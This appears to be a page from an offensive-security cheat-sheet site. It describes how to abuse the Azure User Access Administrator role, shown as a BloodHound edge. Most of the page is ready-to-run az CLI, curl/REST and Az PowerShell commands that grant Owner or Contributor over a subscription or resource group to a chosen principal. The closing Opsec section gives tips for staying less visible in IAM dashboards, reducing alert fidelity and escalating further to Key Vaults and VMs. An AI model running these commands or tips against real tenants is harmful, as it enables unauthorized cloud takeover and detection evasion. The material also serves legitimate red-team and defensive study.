🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZUserAccessAdmin

AZUserAccessAdmin

The source principal holds the User Access Administrator role on an Azure resource scope, allowing it to assign any Azure RBAC role (including Owner) to any principal on that scope.

Applies to: User / ServicePrincipal β†’ AZSubscription / AZResourceGroup / AZResource

Linux Abuse

Assign Owner role to self on subscription (az CLI)

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>

az role assignment create \
  --assignee <object-id> \
  --role "Owner" \
  --scope "/subscriptions/<subscription-id>"

Assign Owner on resource group

az role assignment create \
  --assignee <object-id> \
  --role "Owner" \
  --scope "/subscriptions/<subscription-id>/resourceGroups/<resource-group>"

Graph API β€” assign Azure RBAC role (REST)

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://management.azure.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

ASSIGNMENT_ID=$(uuidgen)
curl -s -X PUT \
  "https://management.azure.com/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleAssignments/${ASSIGNMENT_ID}?api-version=2022-04-01" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "properties": {
      "roleDefinitionId": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/8e3af657-a8ff-443c-a75c-2fe8c4bcb635",
      "principalId": "<object-id>"
    }
  }'

Owner role definition ID: 8e3af657-a8ff-443c-a75c-2fe8c4bcb635

Windows Abuse

Az PowerShell β€” assign Owner on subscription

Connect-AzAccount -AccessToken <access-token> -AccountId <username>
New-AzRoleAssignment `
  -ObjectId <object-id> `
  -RoleDefinitionName "Owner" `
  -Scope "/subscriptions/<subscription-id>"

Az PowerShell β€” assign Contributor on resource group

New-AzRoleAssignment `
  -ObjectId <object-id> `
  -RoleDefinitionName "Contributor" `
  -ResourceGroupName <resource-group>

Assign any custom role

$roleDefId = (Get-AzRoleDefinition -Name "Virtual Machine Contributor").Id
New-AzRoleAssignment `
  -ObjectId <object-id> `
  -RoleDefinitionId $roleDefId `
  -Scope "/subscriptions/<subscription-id>"

Opsec

  • Role assignments are logged in the Azure Activity Log under "Create role assignment."
  • Assigning Owner to a service principal (rather than a user) is less visible in IAM dashboards.
  • Use the minimum required role (Contributor vs Owner) to reduce alert fidelity.
  • After becoming Owner on the subscription, enumerate Key Vaults, Automation Accounts, and VMs for further escalation.